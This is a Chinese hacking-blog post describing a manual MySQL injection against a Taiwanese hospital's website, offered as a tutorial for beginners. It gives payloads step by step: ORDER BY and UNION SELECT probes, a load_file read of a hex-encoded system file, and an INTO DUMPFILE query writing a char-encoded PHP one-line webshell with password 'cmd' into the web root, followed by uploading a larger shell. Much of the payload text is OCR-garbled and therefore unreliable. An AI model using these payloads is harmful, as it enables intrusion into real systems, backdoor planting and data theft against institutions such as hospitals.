危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2306 浏览20580848

手工搞定台湾某医院网站

总是有些刚学黑的朋友问我Mysql注入怎么得到Webshell,写这篇文章主要目的普及下Mysql手工注入,加…报错,从报错信息中也可以看到数据库是Mysql的。

接着提交/返回正常,确定存在注入,这是个字符型的注入。/是Mysql中的注释符号,一般情况下到这时候就要判断字段数了,提交“order by 11/*”返回正常。提交“orderby 12/*”返回错误。

到这我们就能确定有1 1个字段,接下来就是用union select来看出字段的位置,提交“‘union selectl,2,3,4,5,6.7.8.9.10_11F”就馁出了字段的位置。我们先看看当前账户是什么提交“'union select1,2,user,4,5,6,7,8,9,10,11/*”在3的位置成功爆破出用户。

现在先判断一下有没有读写权限,如果有读写权限,加上前面报错的时候已经知道了Web路径,我们就可以直接导人一个Web sh ell到服务器,提交“and%20(select%20count(*)%20from%20mys ql.user》0/*”返回正常。返回正常证明有读写权限,我们实验一下看能不能读文件,提交“十union select l,2,load_file(0x633A5C626F6F742E696E69),4,5,6,7,8,9,10,11/*'’,成功读取了文,Load_flie这个东西很有用,咱们还可以读取su的配置文件获得密码,或者别的重要文件,这个自己自由运用。

现在我们写个一句话到服务器提交“and 1=2union selectO,O,concat(char(60),char(63)jchar(112),char,char(!12),char(3 2),char(64) icbar(101)jchar(ll 8),char(97) Tchar 108),char(40),char(36),char(95),char(80),ar(79),char(83),char(84),char(91),char(99),char(10 9),char(10 0),char(93),char(41),char(63),char(62),0,0,0,0,0,0,,0 into dumpfife 'd:\hxam,pplite\\htdocs\\vghtpe_history\\fei.php'/* 我把一句话木马上传到网站根目录下,密码为“cmd”,然后我们用一句话客户端连接下看能不能连接,连接成功,然后用一句话上传一个大马,到此为止收工……